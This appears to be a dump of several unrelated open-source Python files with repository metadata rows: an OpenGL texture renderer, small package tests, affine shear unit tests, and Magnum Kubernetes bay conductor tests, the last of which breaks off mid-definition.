# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size + textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tobytes())
# if 'imageGT' in which:
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# # GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
if any(attr in which for attr in ('v', 'f', 'vc', 'ft', 'camera', 'texture_stack', 'imageGT')):
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture is not None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms + terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result != 0
@depends_on(dterms + terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
# use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0], 1]) * mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(
self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
# Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, :3].astype(np.float64)) / 255.0
result[:, :, 1] = 1. - result[:, :, 1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:, 1] = 1.0 - 1.0 * data[:, 1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on('ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size // 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size, 2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms + terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
@depends_on(dterms + terms)
def boundaryid_image_aa(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image_aa(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],
GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.float64)) / 255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0., 0., 0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1, 1, 3))  # 4294967295 == 2**32 - 1 marks background pixels with no visible face
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:, :, :2].copy()
# Temporary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:, :, 0] *= self.texture_image.shape[1] - 1
texcoord_image[:, :, 1] *= self.texture_image.shape[0] - 1
texture_idx = (self.texcoord_image[:, :, 2] * len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:, :, 0] + texcoord_image[:, :, 1] * self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
def main():
pass
if __name__ == '__main__':
main()
| 47.797048 | 348 | 0.619451 | 72,325 | 569,932 | 4.687563 | 0.01561 | 0.028588 | 0.01645 | 0.013612 | 0.980506 | 0.977014 | 0.972982 | 0.968097 | 0.966021 | 0.962835 | 0 | 0.030749 | 0.245519 | 569,932 | 11,923 | 349 | 47.801057 | 0.757683 | 0.223481 | 0 | 0.941626 | 0 | 0.000611 | 0.074066 | 0.005376 | 0 | 0 | 0.000055 | 0.000503 | 0.003056 | 1 | 0.030257 | false | 0.000153 | 0.006112 | 0.002751 | 0.065251 | 0.005348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
12bb16c760ec987c2c1de00723ed1d72a470431f | 134 | py | Python | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | 10 | 2021-11-21T20:31:35.000Z | 2022-02-15T02:02:05.000Z | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | 12 | 2021-11-21T20:27:00.000Z | 2022-03-25T12:01:28.000Z | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | null | null | null | """General tests."""
from stransi import __version__
def test_version():
"""Test version."""
assert __version__ == "0.3.0"
| 14.888889 | 33 | 0.641791 | 16 | 134 | 4.8125 | 0.6875 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0.186567 | 134 | 8 | 34 | 16.75 | 0.678899 | 0.208955 | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
12bc5a11d173c0a326338dda42a4206128de408d | 159 | py | Python | services/controller/src/plz/controller/images/__init__.py | prodo-ai/plz | 46d179fca5730b7ed2f236d53d78c42358aed72b | [
"MIT"
] | 29 | 2018-04-14T20:05:41.000Z | 2019-04-15T09:02:40.000Z | services/controller/src/plz/controller/images/__init__.py | neomatrix369/plz | 12f05a8d071e9c1976c444d34161530ffa73eeae | [
"MIT"
] | 23 | 2018-04-14T23:32:32.000Z | 2019-06-07T21:38:58.000Z | services/controller/src/plz/controller/images/__init__.py | neomatrix369/plz | 12f05a8d071e9c1976c444d34161530ffa73eeae | [
"MIT"
] | 3 | 2018-09-19T15:08:21.000Z | 2019-03-22T12:21:07.000Z | from .ecr import ECRImages # noqa: F401 (unused)
from .images_base import Images # noqa: F401 (unused)
from .local import LocalImages # noqa: F401 (unused)
| 39.75 | 54 | 0.735849 | 22 | 159 | 5.272727 | 0.5 | 0.206897 | 0.362069 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 0.169811 | 159 | 3 | 55 | 53 | 0.810606 | 0.371069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4200060b819e185ebb97d6670a07f069f4cc949f | 2,668 | py | Python | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 2 | 2020-07-01T06:20:44.000Z | 2020-07-01T09:36:48.000Z | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | null | null | null | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 1 | 2020-06-29T18:40:54.000Z | 2020-06-29T18:40:54.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_affine_shear_y_in_x_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 2, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_x_plane(angle_y_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_z_in_x_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[2, 1, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_x_plane(angle_z_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_x_in_y_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 1, 2] = 1
transform = cle.AffineTransform3D()
transform.shear_in_y_plane(angle_x_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_z_in_y_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[2, 1, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_y_plane(angle_z_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_x_in_z_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 1, 2] = 1
transform = cle.AffineTransform3D()
transform.shear_in_z_plane(angle_x_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_y_in_z_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 2, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_z_plane(angle_y_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
| 21.516129 | 62 | 0.643553 | 417 | 2,668 | 3.913669 | 0.083933 | 0.031863 | 0.025735 | 0.066176 | 0.970588 | 0.970588 | 0.958333 | 0.958333 | 0.958333 | 0.958333 | 0 | 0.048968 | 0.219265 | 2,668 | 123 | 63 | 21.691057 | 0.734518 | 0 | 0 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 1 | 0.075 | false | 0 | 0.025 | 0 | 0.1 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
421b6a0a1f08440591c3733c6145b2dd07d89039 | 24,565 | py | Python | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | null | null | null | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | null | null | null | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | 1 | 2020-09-09T14:35:08.000Z | 2020-09-09T14:35:08.000Z | # Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mock import patch
from oslo_config import cfg
from magnum.conductor.handlers import bay_conductor
from magnum import objects
from magnum.tests import base
class TestBayConductorWithK8s(base.TestCase):
def setUp(self):
super(TestBayConductorWithK8s, self).setUp()
self.baymodel_dict = {
'image_id': 'image_id',
'flavor_id': 'flavor_id',
'master_flavor_id': 'master_flavor_id',
'keypair_id': 'keypair_id',
'dns_nameserver': 'dns_nameserver',
'external_network_id': 'external_network_id',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'docker_volume_size': 20,
'cluster_distro': 'fedora-atomic',
'coe': 'kubernetes',
'token': None,
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'labels': {'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan'},
'tls_disabled': False,
'server_type': 'vm',
'registry_enabled': False
}
self.bay_dict = {
'uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
'baymodel_id': 'xx-xx-xx-xx',
'name': 'bay1',
'stack_id': 'xx-xx-xx-xx',
'api_address': '172.17.2.3',
'node_addresses': ['172.17.2.4'],
'node_count': 1,
'master_count': 1,
'discovery_url': 'https://discovery.etcd.io/test',
'master_addresses': ['172.17.2.18'],
'ca_cert_ref': 'http://barbican/v1/containers/xx-xx-xx-xx',
'magnum_cert_ref': 'http://barbican/v1/containers/xx-xx-xx-xx',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
}
cfg.CONF.set_override('trustee_domain_id',
'3527620c-b220-4f37-9ebc-6e63a81a9b2f',
group='trust')
self.context.auth_url = 'http://192.168.10.10:5000/v3'
self.context.user_name = 'fake_user'
self.context.tenant = 'fake_tenant'
osc_patcher = mock.patch('magnum.common.clients.OpenStackClients')
self.mock_osc_class = osc_patcher.start()
self.addCleanup(osc_patcher.stop)
self.mock_osc = mock.MagicMock()
self.mock_osc.magnum_url.return_value = 'http://127.0.0.1:9511/v1'
self.mock_osc.cinder_region_name.return_value = 'RegionOne'
self.mock_osc_class.return_value = self.mock_osc
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid)
def _test_extract_template_definition(
self,
mock_objects_baymodel_get_by_uuid,
missing_attr=None):
if missing_attr in self.baymodel_dict:
self.baymodel_dict[missing_attr] = None
elif missing_attr in self.bay_dict:
self.bay_dict[missing_attr] = None
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
mapping = {
'dns_nameserver': 'dns_nameserver',
'image_id': 'server_image',
'flavor_id': 'minion_flavor',
'docker_volume_size': 'docker_volume_size',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'master_flavor_id': 'master_flavor',
'apiserver_port': '',
'node_count': 'number_of_minions',
'master_count': 'number_of_masters',
'discovery_url': 'discovery_url',
'labels': {'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan'},
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'tls_disabled': False,
}
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'docker_volume_size': 20,
'discovery_url': 'https://discovery.etcd.io/test',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'tenant_name': 'fake_tenant',
'username': 'fake_user',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'region_name': self.mock_osc.cinder_region_name.return_value,
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
if missing_attr is not None:
expected.pop(mapping[missing_attr], None)
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_with_registry(
self,
mock_objects_baymodel_get_by_uuid):
self.baymodel_dict['registry_enabled'] = True
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
cfg.CONF.set_override('swift_region',
'RegionOne',
group='docker_registry')
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'auth_url': 'http://192.168.10.10:5000/v3',
'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
'discovery_url': 'https://discovery.etcd.io/test',
'dns_nameserver': 'dns_nameserver',
'docker_volume_size': 20,
'external_network': 'external_network_id',
'flannel_backend': 'vxlan',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'magnum_url': 'http://127.0.0.1:9511/v1',
'master_flavor': 'master_flavor_id',
'minion_flavor': 'flavor_id',
'network_driver': 'network_driver',
'no_proxy': 'no_proxy',
'number_of_masters': 1,
'number_of_minions': 1,
'region_name': 'RegionOne',
'registry_container': 'docker_registry',
'registry_enabled': True,
'server_image': 'image_id',
'ssh_key_name': 'keypair_id',
'swift_region': 'RegionOne',
'tenant_name': 'fake_tenant',
'tls_disabled': False,
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trustee_username': 'fake_trustee',
'username': 'fake_user',
'volume_driver': 'volume_driver'
}
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_coreos_with_disovery(
self,
mock_objects_baymodel_get_by_uuid):
self.baymodel_dict['cluster_distro'] = 'coreos'
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
